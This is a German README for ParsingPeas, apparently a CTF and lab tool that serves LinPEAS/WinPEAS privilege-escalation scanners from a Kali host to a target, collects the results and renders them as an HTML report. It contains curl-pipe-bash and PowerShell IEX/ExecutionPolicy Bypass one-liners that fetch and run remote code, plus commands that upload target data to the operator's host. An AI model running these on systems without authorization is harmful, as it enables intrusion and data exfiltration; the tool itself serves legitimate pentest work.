
HTML-Parser für PEAS-Ausgabe mit zusätzlichen Funktionen
Automatische PEASS-Sammlung + ein sauberer, portabler HTML-Bericht für CTF- und Labore zur Privilegienausweitung.
Führe auf dem Ziel einen Befehl aus. ParsingPeas holt LinPEAS/WinPEAS von deinem Kali-Host, führt den Scan aus, überträgt die Ausgabe zurück und erstellt daraus einen einzigen eigenständigen HTML-Bericht, den du lesen, durchsuchen, sichten und behalten kannst – kein manueller Dateitransfer, kein Internet auf dem Ziel.
Berichtszusammenfassung – Abschnitte nach LinPEAS eigenen Kategorien gruppiert, mit Markierungspunkten und einer Fundleiste:

Nur Funde – ein Klick filtert den Bericht und die Seitenleiste auf Abschnitte mit kritischen/hohen Treffern:

Vollständige Terminalausgabe – der komplette, originalgetreu farbige Scan; durchsuchbar mit Strg-F:

Die rohe PEASS-Ausgabe ist eine endlose Wand aus Terminaltext, die verschwindet, sobald deine Shell stirbt. ParsingPeas:
scp, kein selbst hosten von linpeas, kein Kopieren und Einfügen der Ausgabe zurück nach Kali..html-Datei, die du von der Box kopieren, archivieren oder offline per Doppelklick öffnen kannst.Es ist Präsentation + Logistik, nicht eine Exploit-Engine: Es bewahrt getreulich PEASS eigene Farbgebung und Funde, anstatt sie zu hinterfragen.
file://.N kritisch / N hoch-Chips, die zwischen markierten Abschnitten springen, plus Farblegende.bash) und WinPEAS (PowerShell).git clone https://github.com/YuvalMil/ParsingPeas.git
cd ParsingPeas
./setup.sh # lädt LinPEAS + WinPEAS in scripts/ herunter
pip3 install -r requirements.txt
python3 receiver.py # startet auf http://0.0.0.0:8005
Lasse receiver.py laufen. Finde die IP, unter der das Ziel dich erreichen kann:
tun0-Adresse – ip -4 addr show tun0Linux/Unix (verwendet curl, fällt auf wget zurück):
curl -sSL http://YOUR_KALI_IP:8005/get-script | bash
Windows (PowerShell / Reverse-Shell):
powershell -ExecutionPolicy Bypass -Command "IEX(New-Object Net.WebClient).DownloadString('http://YOUR_KALI_IP:8005/get-script.ps1')"
Wähle den Einzeiler, der zum Ziel-Betriebssystem passt – Linux liefert LinPEAS, Windows WinPEAS.
Berichte werden auf deinem Kali-Host in ./reports/ erstellt. Entweder:
http://YOUR_KALI_IP:8005 und klicke auf einen Bericht, oderxdg-open ./reports/report_<host>_<timestamp>.html
Kopiere diese einzelne .html-Datei beliebig – sie funktioniert eigenständig.
Ziel → lädt Wrapper von Kali herunter → führt PEASS aus → sendet Ausgabe per POST → Kali parst → eigenständiger HTML-Bericht
Das Ziel benötigt niemals Internet – der Wrapper und die PEASS-Binärdateien werden alle von deinem Host bereitgestellt.
Wenn der Einzeiler fehlschlägt, erledige es manuell.
Linux:
# Auf dem Ziel
curl http://KALI_IP:8005/get-linpeas -o /tmp/lp.sh
chmod +x /tmp/lp.sh
/tmp/lp.sh > /tmp/out.txt
# Zurücksenden
curl -X POST -H "X-Hostname: $(hostname)" -H "X-Scan-Type: linpeas" \
--data-binary @/tmp/out.txt http://KALI_IP:8005/upload
Windows (PowerShell):
Invoke-WebRequest -Uri http://KALI_IP:8005/get-winpeas -OutFile $env:TEMP\wp.exe
& "$env:TEMP\wp.exe" > $env:TEMP\out.txt
Invoke-WebRequest -Uri http://KALI_IP:8005/upload -Method POST `
-Headers @{"X-Hostname"=$env:COMPUTERNAME; "X-Scan-Type"="winpeas"} `
-InFile $env:TEMP\out.txt
Verarbeiten eines bereits vorhandenen PEASS-Dumps:
python3 parser.py /pfad/zu/peas_output.txt # schreibt einen HTML-Bericht nach ./reports/
Bearbeite den oberen Teil von receiver.py:
curl http://KALI_IP:8005/health, um die Konnektivität zu prüfen; öffne die Firewall mit sudo ufw allow 8005/tcp./get-linpeas? Führe ./setup.sh aus, um die PEASS-Binärdateien zu holen.⚠️ Nur für autorisierte Penetrationstests, CTFs und Labore.
Erstellt auf Basis von PEASS-ng von @carlospolop. ParsingPeas sammelt und präsentiert nur dessen Ausgabe.
MIT-Lizenz · Beiträge willkommen
| Einstellung | Standardwert | Anmerkungen |
|---|
| Port | 8005 | ändere die Zeile app.run(... port=...) |
OUTPUT_DIR | ./received_outputs | rohe hochgeladene Scans |
REPORTS_DIR | ./reports | generierte HTML-Berichte |
SCRIPTS_DIR | ./scripts | LinPEAS/WinPEAS-Binärdateien |
MAX_UPLOAD_SIZE | 10 MB | durchgesetzt – größere Uploads erhalten HTTP 413 |